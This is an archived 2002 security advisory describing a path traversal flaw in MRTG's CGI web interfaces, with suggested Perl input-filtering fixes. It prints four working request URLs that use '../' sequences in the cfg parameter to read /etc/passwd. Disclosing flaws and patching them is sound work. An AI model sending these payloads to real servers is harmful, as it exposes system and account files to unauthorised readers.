Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: unix5059.htm

mrtg monitoring web interface may be fooled to read system files



3rd Feb 2002 [SBWID-5059]
COMMAND

	mrtg monitoring web interface may be fooled to read system files

SYSTEMS AFFECTED

	MRTG 2.9.18pre1 and previous ??

PROBLEM

	UkR-XblP of UkR security team reported :
	

	The following is self explanatory -
	

	http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd

	http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd

	http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd

	http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd

	

SOLUTION

	Patch available soon ??
	 

	http://www.mrtg.org

	

	Workaround, parse input :
	 

	$input =~ s/[(\\.\\.)|\\/]//g;

	

	

	Update (04 February 2002) \"SJ\" proposed : ======
	

	my $SECMSG = \'Pliz dont hekk us\\n\";

	

	if(!defined $q->param(\'cfg\')){ die \"missing cfg file\\n\"; }

	my $xx = $q->param(\'cfg\');

	

	if($xx =~ /\\.\\.|\\/\\/|\\.\\//){ die $SECMSG; }

	if($xx =~ tr/a-zA-Z0-9_\\-//dc){ die $SECMSG; }

	

	you could also check the ownership of $cfgfile  and  deny  opening  root
	(and maybe other) owned files.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH